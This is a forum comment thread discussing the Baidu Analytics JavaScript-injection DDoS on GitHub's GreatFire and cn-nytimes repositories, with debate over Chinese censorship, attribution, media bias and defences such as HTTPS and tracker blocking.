For instance, if the governing elite is composed of ("extracted from") people from all parts of society, attracting the best of them with some good rewards (e.g. not money, but something like "good fame") and they collegially discuss important issues using the powers of associations, it could very well be a sane way to distillate the will of the people. Maybe even a saner way than ours (where representatives are elected from their good-looking face, this has been proven).


I don't know, I'm kind of skeptical of the ability of closed elites from anywhere doing things that are fair. We've seen the last few years how tightly linked elites in European/US societies have been evading tax responsibilities, trampling on constitutions or laws to spy on citizens, protecting those responsible for the 2008 crisis, fabricating evidence for various invasions etc. I just mean to say that temptation is too great - openness is too often a toothless tool, but it helps check those elites when their interests veer wildy away from the common good.

China is weird because it's so closed, and it's often tempting to say that the elites here are doing a pretty good job of doing what's best for the people. Until you read about how much money they are making personally from abusing their positions.


> but today they might let the protest get a bit wild if they want to allow the protesters a bit of leeway, and then those untrained, poorly equipped policemen will be screwed.

I'd say most often than not, when a government lets a protest get wild it's because they want to justify the harsh repression that's coming or at least that when the time comes for decision, they won't side with the protestors.

Or they're just in over their head but in that case, they don't let it get wild, they just loose control.


The HK protests were interesting recently for that reason - the protestors had the momentum, and the governments first reaction if it was mainland China would probably be to crush it. They let it boil over, and eventually the momentum was lost and anti-protestor sentiment took over. Whether that was by design or 'helped along' is another issue, but it showed how popular protests can sometimes just sour if left to their own devices.


Occupy Wall Street comes to mind as another example. NYC sentiment turned rather quickly against that movement once the public delectation, rape allegations and the inconvienient even caused by protestors started to boil over.


At university my friend was studying police tactics dealing with football hooligans and riots in the UK - they were slowly changing their tactics from full-on horse charges and batons waving to a very tai chi style light touch. Generally speaking the moderates would get bored and go home and then leave only the hardcore, who were then easier to identify and target. The light touch is a fantastic PR tool too because it shows any gov as tolerant and open.


I live in China, and I disagree with your statement, but I can understand why you think like that.

Usually when you reside in a country for a long time, you don't think the government as a whole, big, flat thing. The size of the it is gigantic, so that anything you do, you might be interacting with government at some level. I'm not judging this but giving you an image of what it's like living in China, salt, gas, newspaper, movies, all the crazy stuff, are controlled by different departments of government.

But here we are talking about the internet, the thing that Chinese government cannot control, they tried, they tried hard to stop people from accessing free, open internet, from playing foreign games, from using foreign softwares, but much of them were failed. There were years that Chinese Expansions of the World of Warcraft were years late than the rest of the world, and yet, Diablo III is still not public, the stated reasons were, erotic and violence content, on the other hand, there are more bizarre webgames on Chinese market, trolling millions of millions of money from players pocket, and of course they are poorly designed, some of them even has copyright infringement.

With this event (DDoSed Github),the message is quite clear, China wants to fork their own internet, for their own people. This is certainly a very high "degree of control over their citizens."


> China wants to fork their own internet, for their own people.

I thought it was pretty well known that the BRICS countries want their own internet:

http://www.infowars.com/brics-countries-build-new-internet-t...


Building new backbones is completely different from forking the Internet.


China is a huge place, and I would agree with your definition of "erratic control" in the context of various non-industrial provinces...

That said, the reality is that most of what you are referring to is representative of "controlled dissent." It's not "martial law" or some kind of truly orwellian mind-control scheme... it's just the product of very tightly controlling the country's written/perceived history, with a significant focus on nationalizing "information" (ie, parse everything that comes in and out of the country via digital channels).

Once you see the way they handle the lesser-publicized issues (ie, Uighur/Han unification, Tiananmen, and Taiwan), you begin to realize that they do have the power to whitewash history on a generational scale, and considering that (as you mentioned) they take a fairly lax enforcement approach toward the "general populous," I'm curious to know what perceived ideological threats their best and brightest are working to mitigate. And how many people have simply "disappeared."


And you haven't been to France

Does France has a Great Firewall on the Internet?

Does France allow people to study about their actions in Algeria, for example? They do.

(or you're part of the conspiracy, I can't exclude that)


Great Firewall is not there because NSA is.


> the entire reality they see and what they believe to be true is heavily distorted

I have to disagree with others that this part of your comment is a bit too strong. I lived in China for two years and many people I talked to would say something like "We admire America because it is so free, our country is just so corrupt" or whisper something like "when the US says our human rights are bad, we agree."


I think the disillusionment exists, especially among the youth and democratically-minded. In my opinion, for such a regime to be successful in the modern day it must exist... that said, I would say the most telling aspect is how these particular individuals view their goals and/or definitions of "success."

America certainly isn't the democratic ideal, however in contrast it's apparent how a sustained cultural ideal can eventually swing the legislative tide (LBGT rights, marijuana legalization, et al.). From my experience, even the Chinese protests are government-sanctioned ("order through controlled disorder") and the communication happening on platforms such as Sina Weibo is generally devoid of any cultural or philosophical taboos.

I'm hesitant to be too strong about this because truthfully I haven't spent much time there in the most recent years, however I can't say I've seen any indication this has changed--everything points to more of the same, and the most recent Hong Kong protests provided a rather interesting look at how this cognitive dissonance plays out in an environment where maintaining such control (due to its international economic relevance) is more difficult.


>I think the disillusionment exists, especially among the youth and democratically-minded.

This. Except older, middle-class people are even more disillusioned than the young. As a rule, older Chinese people won't talk about their disillusionment, but those who lived through the 50s and 60s faced huge obstacles. They live lives of quiet desperation.


I think both of you are correct. Those distortions to that extent do not fully disable every individual's awareness regarding something not good.


> the entire reality they see and what they believe to be true is heavily distorted--in that, it is defined by the vision of the oligarchy and information is carefully controlled to produce a desired set of beliefs.

That's pretty much how I feel about the Fox-watching population of the US.


> That's pretty much how I feel about the Fox-watching population of the US.

It's how I feel about everyone who gets their information from TV.


> That's pretty much how I feel about the Fox-watching population of the US.

I used to think the same thing, and to some degree I think it holds truth. But after spending lots of time with my right-wing family, I think it's a bit more nuanced than that. Most avid Fox News watchers I've met fail to embrace the entire world-view or vision promoted on the channel, and share maybe 60-70% of the opinions elicited toward viewers. I know, it's just one data point, but I don't have a study handy.


I think it's generally safe to assume that a large chunk of people who happen to hold opinions you disagree with don't hold them because they are retarded. Even Fox News viewers.


It's also how I feel about the RT-watching population of the US.


It's also how I feel about the CNN-watching population of the US.


Except that we have free speech in this country, so Fox can be, and is, heavily and freely criticized freely all the time.

And because we have free speech, there are multiple alternatives that act as checks and balances across our culture as a whole.

In other words, comparing Fox to the media situation in China or Russia is just ridiculous and irresponsible.


In other words, comparing Fox to the media situation in China or Russia is just ridiculous and irresponsible.

The point of "comparing" anything to anything else is to see how the things are alike, and how they differ, as in "compare and contrast." If such comparisons are to be verboten, even if by stigma and not by fiat, then we are giving up an essential tool of understanding.


Let's look up definitions of compare.

https://www.google.com/search?q=define%3Acompare&ie=utf-8&oe...

I'm using it in a valid way, and not in the way you suggest, and it's clear from context which meaning I am using.


That may be the meaning you are using, but that's not what the other commenters are doing.


There are just as many (and few) conscious people in any country on the planet. Thinking otherwise is inaccurate and also reinforces and in fact validates the efforts of local powers to rally a larger part of their subjects in defence of a cultural, irrelevant but real, identity, thus muddling the problem. There were as many (and few) resistants in Nazi Germany as there were in France. I see all these people as my "brothers/sisters" and I don't like it when they are drowned in a sea of commiseration.


> It can be hard to grasp occasionally, coming from a western mindset but for the vast majority within said countries, the entire reality they see and what they believe to be true is heavily distorted--in that, it is defined by the vision of the oligarchy and information is carefully controlled to produce a desired set of beliefs.

You are delusional if you believe the above doesnt apply to US and EU countries.


It seems completely bizarre. At least the government has the wisdom to not publicly take credit for it. It looks really bad when one of the most powerful nations on earth, over a billion strong, can't stop a little 300 person operation.

Github is smart and talented, and i'm sure that bandwidth cost is horrible. But they are up against an organization 7 orders of magnitude larger, and seem to be holding up just fine.

I kinda hope China comes out and says, whoops, unauthorized sneaky hackers. Github's resilience makes them look like a joke.


At this point do they really have a option besides continue until Github caves because of mounting costs?

Admitting whoops, unauthorized sneaky hackers co-opted our national packet mangling infrastructure would be a LOT of egg on their face.


That's a big freaking gamble. How effective does Github's mitigation need to be to make the costs tolerable? They're already using a full 1% of the traffic to ddos, they can only double that 7 times.

Really, at this point Github could probably put together a really nice blacklist of baidu users outside of china, and whitelist those that actually use the service. I can think of a couple of cute ways to accelerate the whitelisting.

Banking on Github not finding a good enough solution seems really risky.

Why not just ddos every time there's positive Github news? Ideally a half hour in advance of the event? China must know when MS is going to host some cool new project. China must know when the U.S. data service is going to host a cool new project. China must know when Github is going to announce a new feature.

This approach is just super half assed.


Side question, does GitHub run ruby on rails? If so, I'm pretty impressed.


They are on Rails 3 which is pretty old for Rails standards and they got there recently. See http://shayfrendt.com/posts/upgrading-github-to-rails-3-with...

This is their architecture in 2009 https://github.com/blog/530-how-we-made-github-fast Couldn't find anything more recent.


They do, but a real ruby on rails site typically serves most html content out of memcache, even higher for users that aren't logged into the platform. Its not unknown to see 5-10ms response times in those scenarios


>can't stop a little 300 person operation.

Police forces can infiltrate world-wide gangs.

What's stopping China from infiltrating Github if this DDoS doesn't work out?


Is there any evidence of China infiltrating Microsoft or other major OS vendors?


While I don't know of any cases relating to Microsoft, there have been a number of Chinese spies found in American companies (defence, industrial components, medicine). There's a summary on en.m.wikipedia.org/wiki/Chinese_Intelligence_Operations_in_the_United_States


Who said this would only be for a few hours? DDOSing Github drives up their hosting costs massively, creating a financial incentive to comply with China's demands.

Aside from that, it's just Eastern politics, which works by a whole lot of bullying and childish tactics when they don't get their way. Not to say that it doesn't happen in Western politics, just much more subtly. And it doesn't seem so bad since we're the good guys.


> And it doesn't seem so bad since we're the good guys.

Post-Snowden, check your premises.


> And it doesn't seem so bad since we're the good guys.

I'm pretty sure that was meant to be tongue-in-cheek.

> Post-Snowden, check your premises.

What premise are you making? That the United States conducts espionage?


You know that post down there somewhere in this thread that says that having classified state secrets is the same as having widespread political censorship? That's the kind of gulf between saying the U.S. "conducts espionage" and the fact that it also conducts mass surveillance of billions of people ;)

But I am with you on the broader point, "we're the good guys" was probably meant sarcastically, since very few people outside of Fox news commentators would say it un-ironically about the U.S. (or any country as a whole, really).


I'm working in a 100% Chinese high-tech company, and asked my colleagues: they think it is just a test (that was my first impression too).


This means A LOT to the rest of the world.

China in history always claims that they don't intervene with things of other country, but in these days, they shamelessly attacked an US company.


What do they think China is testing?


They're probably demonstrating that the Chinese government can leverage nearly the entire Chinese internet userbase to DDOS anyone they want, at any time, and the easiest protection mechanism is to block Chinese IPs. Which is exactly want they want.


Except this particular attack is not coming from Chinese IPs, rather from visitors of Chinese websites from outside China.


right, which is why unfortunately github couldn't counter by piping in some anti-china propaganda or something.

As a sidenote though, VPN users are probably also affected.


Maybe they could -- it might not be a wise move, particularly given the political tensions which obviously exist already, and it would certainly be inflammatory, but it may well be technically possible.

Github serves HTML over HTTPS, which means that if they started putting a few well-chosen words in Chinese in every HTML page served to China, the only thing the government could easily do about it would be to block github from Chinese users entirely -- which they've already tried once, and didn't keep up, presumably because cutting off github for more than a few days poses problems for their own domestic software sector.


Chinese VPN users are absolutely affected, and in fast this puts more pressure on Chinese-used VPN services, and to a lesser extent the users, too.


Damn! I just realized, github is getting a full 1% of baidu's traffic. I wonder if they're getting the search terms. I bet they're getting cookies.

The ultimate mitigation might be google paying to show the results instead of baidu.

Or just showing their own ads.


Github wouldn't get baidu's cookies since they're different domains.


They could if they put code to read cookies in JS and send them home in the JS included in people's pages.


Good point, all the more reason page authors should use httpOnly cookies: https://www.owasp.org/index.php/HttpOnly


> leverage nearly the entire Chinese internet userbase

Well, not just Chinese users. Anyone who was accessing a site that used Baidu's analytics, regardless of where they came from. Things like this remind me why I like Piwik so much.


It's hard to tell if this is a decision from high up in China's PRC ranks, or lower in the ranks, or even a false flag/experiment.

It highlights how XSS attacks can target arbitrary sites extremely efficiently, just by finding a strong vector origin point to deface (like Baidu's foreign filter JS).


I see many goals, but I find it most likely that this was the digital version of a weapon test. The arbitrary use of 1% and the simplicity of the attack seems perfect for demonstrating a capability. As a bonus, they get to send a message about circumventing, see the effectiveness, and test defenses against it. All without having to official claim credit for it.


Both of the targets for their DDOS were projects to help you circumvent their firewall. If it happened to also bring down Github at the same time I doubt they cared too much.


Testing their DDoS "weapons" may also be a good reason. Of course, protection will also get better, so it's a double edged sword (for them).


>> What's the actual goal behind the attack?

The answer to that question is in the article:

"As can be seen in the code, the two targeted URLs are github.com/greatfire and github.com/cn-nytimes, which are mirror sites for GreatFire.org and the Chinese New York Times. GreatFire and NYT both use GitHub to circumvent the online censorship performed by the Great Firewall of China (GFW)."


Interestingly, i believe these same projects used to get attacked on code.google.com as well


I think you answered your own question..

> What's the actual goal behind the attack? > pissing the whole world off for a few hours


Netresec should be able to gradually increase the TTL of their packets going to Baidu to see which hop or link is doing the hijack.

They mention someone did this earlier with the iCloud hijack by using mtr and tcptraceroute, but it looks like these tools won't work as-is this time because the Github man-on-the-side attack waits for the HTTP GET request. It's probably stateless and if so could be triggered by a lone ACK with a proper HTTP GET inside. As long as they're not behind a stateful firewall, replaying their ACK at various TTLs to find the smallest TTL that triggers the hijack would probably do the trick.

If the hijackers are clever they could make it look like the compromised hop is further away than it actually is, but not closer. Even so, this could be useful information and I'd love to see the result if anyone tries it.

Edit: changed trace method so that it'd actually work.


I think this might be a daft question, but why can't they inject packets with a (roughly) appropriate TTL for the current sequence that they're hijacking? From the two examples shown one might think they're picking ttl's more randomly


They could make the packets stand out less, but there'd still be the overlapping reply from the legitimate Baidu host, unless the attackers went full MITM.

In case anyone is confused: we're now talking about the TTL of the packets coming from hijackers, whereas I was originally talking about the TTL of the packets going towards Baidu and the hijackers. The TTL the hijackers send won't affect the tracing method I was suggesting.


"Our analysis shows that only about 1% of the requests for the Baidu Analytics script are receiving the malicious javascript as response. So in 99% of the cases everything behaves just like normal."

The way I see it, this has been a diagnostic test by the Chinese government, ensuring they have the power to globally take down any website (or servers) they please.


Possibly. But whoever's behind it end up looking kind of bad, since Github has not capitulated.


But if it were 100% would github be able to survive?


Github should have a huge call-to-action banner for every China-based web visitor that leads to this article translated into Mandarin.

Xi Jinping Millionaire Relations Reveal Fortunes of Elite

http://www.bloomberg.com/news/articles/2012-06-29/xi-jinping...

Maybe add a Trollface gif while they're at it.


... which is probably blocked for every China-based web visitor anyway.


I should clarify: I don't think Github should link to the article directly (which is banned since Bloomberg has been banned ever since they published that article)

A plain-text mandarin version in a repo somewhere would suffice to challenge the Chinese government's perception on what it really takes to censor the Internet. I honestly think it would just highlight how much they're losing against an organization of 300.

Failing that, I'm going to resort to my default plan of finding the best way to donate money and time to help support Github, but I thought it was an idea worth entertaining.


Our government is using our own money to spy and undermine our tech companies. What exactly is it doing to ensure American companies are defended ? Protecting us from international thugs like China's Communisty Party is the primary duty of our government.


"...should be the primary duty of our government."

Fixed it?

Although it's interesting to think about. Actual government retaliation would/could be seen as war provocation, especially if China holds on to any plausible deniability. Cyber warfare is currently very hard to prove, but even harder to hold accountable for. Even with DPRK, and our little shut-down-the-"internet" quiet retaliation thing that happened a few months back, North Korea still disavows responsibility. I imagine holding China actually responsible (in the way where it is recognized and acknowledged in the international community) is almost impossible... And thus we would be seen as the aggressors.


A government doesn't have to react offensive against threats. It's also possible to provide defensive measures. In this specific case it could provide infrastructure, computing resources and personal to fend off the attack.


Actually, that would be interesting...

Passing some sort of funding bill for the defense of US companies against DDoS attacks might be the only immediate option that could be done on a short time frame. Otherwise, it could (potentially) be something like the government holding on to spare capacity in some way/shape/form that it leases to affected companies for a very low rate.

As we move on further into the 21st century, I can't see this as something that's going to go away. We definitely need to plan ahead.


Exactly, that's where these vast NSA's datacenters could make sense and actually do something useful.


I don't think plausible deniability is really present here. Unlike other things where we "know" it was the gov't (if only because who else is going to spend the financial resources for the attack), here it's been pretty well disected that this is happening on the Great Firewall level.


I dont think that is the case. US government has abdicated its primary duties for protecting interests of military- industry complex.

What evidence did US provide before attacking Afghanistan? Surely 9/11 was an aggression but US had no evidence to link it with the state of Afghanistan. After American ass got whooped in Afgan they have returned claiming Taliban are no more as bad as they use to be.

What evidence does US have to carry out random Drone strikes in Pakistan killing random people ?

And let me not even start with Iraq, which did absolutely nothing to offend US but instead was destroyed in the name of WMD that did not exist.

But when it comes to Iran, where US interest might have legitimate threat, where Chinese expansion in South China sea and many other places where US could have used its military muscle the government acts as if they are China's bitch.

The real problem I think is that US government has lost the sight of legitimate national security over spending taxpayers money making their friends rich.


China has no plausible deniability for anything at all, because it is run by a bunch of Communist cheats who censor the internet and violently put down any dissent. Practically any reasonable action taken by the US against China would not properly be seen as a war provocation.

Lots of people (and governments) hate the US and would call it a war provocation... but they wouldn't be right and generally, the opinions of scum don't actually matter and should just be ignored.


There must be obscure rules. The United States government can plausibly deny shutting down DPRK's Internet. ...It was barely plausible that there was a reason to shut it down.

There's numerous people and numerous ways for those people to respond to this attack. Maybe they're getting something ready or maybe they don't care.


his post sounded like he thinks the government ought to be defending instead of attacking


If anyone from GitHub is reading this, I know that many of us would like to help. I imagine that the mitigation of this attack has been very costly. Is there a place we can donate to help offset the cost of this attack? Maybe I will purchase a subscription, but a one time payment would be preferable for many of us.


The've raised $100M from a16z about two years ago [1] ? They should be fine without your donation.

[1] https://news.ycombinator.com/item?id=4220353


If Baidu served everything over https, would that effectively make this attack impossible unless the China GFW mitm'd the connections? I suppose that might add a significant server load to Baidu, but I wonder if we should just start accepting SSL as a cost of doing business on the internet.

Of course, that would require Baidu's cooperation, and I suppose they might now want to raise the ire of the Chinese government. Also, I suppose the government could just use their own heavily trafficked sites to do this, but that should isolate it somewhat to Chinese IP ranges.


> that would require Baidu's cooperation

Don't count on that. Baidu is part of the Chinese government gang. It is notorious for censoring/altering search results both for political and commercial reasons. I wouldn't be surprised if they were notified about this beforehand.


Since the requests for hm.js are taking place over HTTP, even if Baidu started responding with 301's to reconnect over SSL wouldn't the GFW be able to just intercept the initial insecure request and respond with its own version of hm.js?


I don't think they would be able to MITM the connections because your browser would detect that they don't own the certificate for the site.

Unless of course, the CA is also compromised.

I'm no expert so please do correct me if I'm wrong =]


So assuming that the Chinese government weaponized their firewall, the question is why are they using it in such a transparent way?

Github is pretty firmly in the camp of open information, and used by nearly every web software engineer in the world. Surely they're not going to succeed at censoring these projects. As an attempt to project power and send some sort of warning, something about it just seems like a pretty flawed strategy.


> As an attempt to project power and send some sort of warning, something about it just seems like a pretty flawed strategy.

I've been wondering about that myself. Perhaps the lesson to be taken away by most is that if you're not Github, you might not be able to effectively counter such an attack. That could lead to self-censorship.


One thing I don't understand: when you have the infrastructure to run the Great Firewall, why not simply generate the traffic yourself ? At this point you might just fake traffic from inside China with any kind of amplifiable no-state protocol.

Sure, the TCP/HTTP attack might be a bit more resource intensive, but it should be doable with the same capabilities provided by their DPI infrastructure, no ?

Edit: Last but not least, if we are sure that this attack is indeed coming from the GFW, then why Obama isn't calling Xi Jinping right now ?


> why not simply generate the traffic yourself ?

Couldn't github simply null-route all chinese-origin traffic in that case?

Currently the DDoS comes from everywhere except china


The point of this DDoS attack is to prevent people in China from accessing content on github. To null-route chinese-origin traffic would mean that the attackers win.

(Obviously VPNs could be used to circumvent this null-route but they then become vulnerable to the same attack)


> The point of this DDoS attack is to prevent people in China from accessing content on github. To null-route chinese-origin traffic would mean that the attackers win.

China already has the capability to block people in china accessing github (and I assume it does)


Yeah, as I explained in reply to martinald, I had missed that. This is indeed a clever tactic. And very bad for Baidu's business, they must be outraged.


The current attack injects two TCP packets containing javascript that makes a person's web browser perform endless requests to the two Github URLs that host the apparent targets. This is a huge amplification. Also, the attacker is hitting fewer than 1% of the Baidu Analytics requests, which might indicate that the attacker is overloaded. In that case they don't yet have unlimited access to Chinese bandwidth.


Because non-chinese visitors (who aren't behind the Great Firewall) also get served this malicious javascript if they load up the code. It's not just Chinese visitors that visit these sites and therefore get the JS code.


Oh, I had missed that ! I thought GFW was for clients, never thought it would apply on servers too.


So, fuck that. The Chinese gov are bullies, but now they're treading on my lawn (or the lawn where I host my things, and all other things of interest/importance).

What can I do? I already block ad tracking code in my browser with µblock. Can I send an email to some English-speaking representative of the communist party telling them to fuck off, and that I'll make sure to chose things not Made in China from now on?


Ghostery blocks most analytics trackers: https://www.ghostery.com/en/

Google Analytics is blocked with that, I'd imagine Baidu Analytics would be blocked too. You can configure it to block / not block individual pieces.


FYI, the referer (or referrer, whatever) method might not work well.

The hijacked code does reside on only a few Baidu domains, but it is used (included by <script> tag) by TONS OF Chinese websites. The code is running in these numerous pages which use Baidu products, not just in Baidu pages. Thus, the referer actually varies a lot.

It is really a cleverer solution to notice the subtle difference of the trailing slash.


DDOS seems to be impacting me intermittently here in Rhode Island https://imgur.com/pW59MG3


Hi Djent,

Would you mind sending an email to support@github.com with details on what you were doing when that happened?

Thanks


It's happening for me constantly - just clicking the link from the discussion - I get a (very) slow page load, then the unicorn page. I'm assuming it's a timeout on the backend.


Last night same for me, browsing the Azure Kuda repo.


Same here. Sometimes it loads, but not usually.


Same here.


Same thing is happening to me. Let me know if I can help (I'm in France if that matters).


When I went to github.com and then this page, this went away for me.


I wonder how GitHub mitigated the attack so successfully. I can't find any baidu scripts using the injected code anymore (in fact the original tracking scripts on baidu's own domain return nothing), and GitHub is now serving the two repos that were originally targeted.

What happened? Whatever it is, I'm glad they were able to mitigate the attacks.


The attack is still going on. Details at https://status.github.com/messages They describe what they're doing to mitigate it.

The latest message is

0:09 UTC

Hour 118: Mitigation remains effective and service is stable.


Yes but they don't explain what the mitigation is.


During an ongoing attack? I wonder why not...


Right. Not looking for specifics. My curiosity would be satisfied by something like "we've reached out to Baidu and they've done X and Y. Meanwhile, traffic has decreased so we've unblocked the affected repos."

Just a bit more transparency on the situation.


It's not baidu.com that serves that malicious code, it gets inserted on its way through the Great Fire Wall.


They might release a post-mortem once it's over, but I wouldn't expect any transparency during the attack itself.


The injection has been stopped and Baidu's script checks if there exists a referer.


What do you mean "has been" stopped? There's no definitively stopping this without HTTPS, which I'm pretty sure hasn't magically "happened" in China in the last couple days.

The GFW may have ceased its attack, but there's no check you can possibly add into an asset delivered over HTTP which can't be undone by the GFW.

As long as there's a script being delivered over HTTP, the GFW can intercept that script request and replace with a script of its own.


I mean the Javascript hijacking has been stopped. This DDoS mixes several ways and during the js hijacking period, GitHub returns `alert()` on specific url for blocking browsers sending ajax requests. For now, the infected urls are back to normal.


There don't even have to be scripts being served -- as long as HTML is being served over HTTP they can inject their own scripts.


Can I black-hole all of China in my hosts file? Off the top of my head I'm not going to miss anything, and I'd hate to be an unwitting participant in future attacks.



You an certainly blackhole all baidu.con domains if you never use their services.


You could use a tool like Ghostery to stop loading Baidu JS


Using dnsmasq¹: $ echo 'address=/.baidu.com/127.0.0.1' >> /etc/dnsmasq.conf

hosts file blocking is more difficult since you must list each subdomain.

¹everyone should


Can browsers or OSs not treat the corrupted Baidu analytics as malware?


You'd think, wouldn't you. Or instead simply blacklist Baidu's analytics code completely. That will only hurt Chinese businesses using Baidu's product, and no-one else.


It would also hurt american, or european, or any nationality of business that uses baidu to get more insight into chinese visitors.

Baidu is certainly most popular within china, but not exclusive to them.


Google Analytics does all that, no worries


Google Analytics is, sometimes, blocked by the GFW – so, if you already sell out your users to Google, using Baidu wouldn’t be an unrealistic use case anymore.


Except when it decides to ddos github


I agree and I even think that this will be unavoidable, if that kind of abuse keeps going on.

Government influence aside, Baidu would be free to host their analytics callbacks for the outside world outside of the GFW. If they stay accomplice to this kind of attack, no matter if forced or willingly, they will suffer.


Given the amount of ad bourne malvertising that is floating around, a content based blacklist of javascript would be a good thing.


and is called "Ghostery"


We could revoke their certificates, that would prevent any HTTPS request from accessing them. It wouldn't solve the issue completely, but it would be a start.


there's lots of China company/sites, you can't block all of them.


If the attack happens as described, and those two repos are aimed at Chinese people, why doesn't Github just block all requests to those pages that come from outside China?


That would be suicide for fear of death.


Most people might not know what kind of organization GreatFire really is because too much context is missing. I only discovered recently it's not so simple. There have been a lot of talks about the behavior of GreatFire for quite for a while but most of the talks are in Chinese. There are some in English though, to give everybody a glimpse here is an example: https://github.com/greatfire/wiki/issues/1

I have an impression is GreatFire tried to weaponize all the users of github. They succeeded.

I don't like the GFW either. But I think I'm very likely to be downvoted because the context of this incident is quite complicated. It's not easy to tell the truth especially when it's against most people's belief.


I'm sorry, what?

Yes, it looks like Github has been pulled into a fight not entirely related to their initial mission. But that's how principle flows, you never know when the free flow of information will turn into a larger fight.

I very much hope that they, and whatever networking partners they're working with, see this through. Because it's bullying bullshit by the Chinese government, trying to make people shut up because that government doesn't like what they are saying. GitHub is a company in America, not in China, and I hope they and their partners have the principles to stand up for the right to say what you think in America. If, by the magic of technology, those statements end up readable somewhere else, so much the better.

Because if GitHub folds to this sort pressure, that pressure will just move on to the next site willing to host something that maybe the Chinese government doesn't like.

You can make your accomodationist crap sound as reasonable as you like. It still amounts to giving in to censorship, and letting other people tell you what you can and can't say. I don't admire that, not one bit.


I disagree that part of the mission of a for-profit organization includes responding to costly censorship measures from another country's government.

Github would lose significant respect by folding, but unless they're ultimately fighting the U.S. Government's censorship, they don't have a claim in this fight.

> that's how principle flows, you never know when the free flow of information will turn into a larger fight.

Sure, whenever chernevik claims you need to enter a fight, you need to take it ;)


I donno, perhaps we're just reading the page differently (And of course, all the context that's in Chinese is lost on us), but I don't really see how GreatFire is using Github in a way that's not intended, as Github is used for lots of non-code repos and AFAIK that's never even been considered an issue. I think saying that they're trying to 'weaponize' github is arguable, but regardless the idea of putting the information they have on somewhere like Github, where making copies and distributing it is extremely easy makes a lot of sense from their standpoint. In addition, Github is nice and popular, meaning lots of people will see. Wikileaks did/does similar things, like posting torrents to large encrypted masses of data on places like Facebook, where lots of people will see it. When you consider they're trying to fight censorship, their actions make sense.


I read there basically that the complains are that hosting GreatFire in GitHub might prompt this sort of reaction from the Chinese government, or might cause them to block GitHub in China. I see no other complain, at least not in English. I don't see anything that I would read as "weaponizing all users of github". At least not in the way this attack "weaponizes" Baidu Analytics users. It seems like valid use of what's essentially a programmer-oriented social network.


The personal is political. It's not possible to exist in a non-political state. It's a lot like Stallman's victim-perpetrator phrase. Nobody wants to think of themselves as either a victim or perpetrator, but here we are and wishing it away unfortunately can't make it true.


Thanks for providing context. It might be unfair to thrust GitHub, and all Chinese developers into this fight. The Chinese government— if the DDoS fails — may very well just block access to Github, developer needs be damned.

Of course that would provide an opportunity for a Chinese counterpart of Github to take market share, perhaps a favorable outcome?


Many of us Chinese developers have already equipped with VPNs and tunnels as a daily productivity tool. It seems that the purpose of the gov'nt is to block access from less tech-savvy users, which greatfire and nytimes-cn provide.


I read that they tried blocking github already, but had to back down because of complaints from the software engineering community there.

Basically the Chinese government is desperately trying to disconnect the Chinese people from the global internet whilst simultaneously trying to minimise the economic damage that creates. Blocking news sites doesn't do a whole lot of damage. Blocking CDNs is totally different.

This sort of thing makes me think about an HTTP extension that lets arbitrary websites promise to proxy for others. Web servers could set an "X-Will-Relay-For: wikipedia.org, github.com, facebook.com, nytimes.com" header and then browsers would be programmed to store these mappings in their local cache as you browse the web. If attempting to reach a website fails, the browser would retry via an SSLd CONNECT request via one of the cached paths, sort of a Tor-lite but aimed purely at unblocking sites rather than anonymization.

Of course there are lots of practical details to work out like traffic management, how to avoid an outage of a large website causing cascading failures etc.


I don't think so, Most Chinese developers love github not only because of infrastructure, but also the wealth of content. There's no substitute.


hmmmm...I wonder if creating an account and upload wikileak document would be good incentive for Github to amend its ToU.


In china, there's lots of similar thing, e.g. your android phone download a app from some site, the ISP(or others in your network path) can detect this(maybe by url) and return a modified version(e.g. add it's own ad or maybe complete a competitor's product of the original app).


So, the real question is how should we, the tech community, react?


More SSL.

This attack works because the firewall is capable of reading plain HTTP requests to spot the ones that are requesting the target javascripts, and then statelessly injecting raced packets. Neither technique works when SSL is in use. Even if China simply demanded the SSL keys from Baidu, they'd have to decrypt every single connection on the fly and significantly upgrade their infrastructure.

I think the only way to continue this technique in the presence of widespread SSL use is to actually force Baidu to insert the malicious Javascript on their own servers.


> Even if China simply demanded the SSL keys from Baidu, they'd have to decrypt every single connection on the fly and significantly upgrade their infrastructure.

Umm... not really. All you'd have to do is select whatever subset of connections you want to inject code in to, and then terminate them with your own web server that has Baidu's SSL keys, then let the rest of the connections go through transparently to Baidu.


You can't easily select that unless the stuff you want is on a dedicated relatively low traffic hostname. If everything is served off e.g. ads.baidu.cn then you have to decrypt all ad traffic, which is a lot.


You can select a random subset very easily at the layer-3/4 level. It's really not that different from just adding a host behind a layer-4 load balancer.

...and actually it doesn't have to be completely random. You could select specific IP addresses to intercept.


This is a really well article outlining how the man-on-the-side attack on Baidu is carried out. The only flaw here is the logical leap that goes from "Baidu is being hijacked" to "Baidu is being hijacked by the Chinese government"


The attack is not on Baidu, but via Baidu.

Whoever is the attacker appears to control the great firewall of China. Who else would that be but the Chinese government?



The line seems to be blurry - as I'm sure it is around the world when it comes to state level "hacking".

http://en.wikipedia.org/wiki/Honker_Union#Relationship_with_...


Sure, but the Chinese government has far more sophisticated ways of taking down sites so their own citizens can't access them, and they're not afraid to use them - even against big name sites. And in fact they often do, to help local companies providing the same offerings to prosper.

The current DDoS attack just strikes me as too crude a method when they have so many other options available.

If you were going to argue that it's just a retaliation towards GitHub for hosting these projects, then once again there are others sites the government is far more concerned about and they could use DDoS to bring them down with far less publicity than what the GitHub DDoS is generating.

It just doesn't seem to make sense from either the method being used or the motivation behind the attacks.


Can the browser/os have an alert for such kind of behavior ? I mean if a script/program is sending repeated/too many requests stop/slow/show users a message ? Like when some javascript scripts is using too much cpu the browsers actually inform the user if he/she wants to stop then ?


This might not be a feasible reaction to the attacks, but in my mind the people who are "unsuspecting attackers" aren't necessarily trying to access GitHub in the first place.

So, what if they set up automated rule to block all IPs (for a period of time) who show traffic patterns that indicate they are part of the attack, and then for all those IPs who are trying to reach GitHub purposefully but are currently blocked, give them explicit instructions on how to tunnel to regain access to GitHub while the attack continues. This way only those who are (a) part of the attack, and (b) want to access resources on GitHub need to do anything special.

My guess is the number who would truly be affected by this are a tiny fraction of the total number of people who are part of the attack.


i read that github contains content that the Chinese do not like and that is why this is happening - what is the content they are so pissed about ?


https://github.com/cn-nytimes/ and https://github.com/greatfire/ host information about and software for circumventing the Chinese government's internet censorship systems -- which, among many other things, blocks access to, eg, Google, and The New York Times.

Apparently they (the Chinese government) are not willing to entirely block Github traffic in the same way (presumably as an important tool for their software industry as well). This DDoS is an attempt to punish Github for not removing this block-circumventing information, and force the inaccessibility of those 2 repos specifically. It is being conducted in such a way that this is readily obvious but plausibly deniable.


At the same time I think the censors do not have the political power to block github all together.

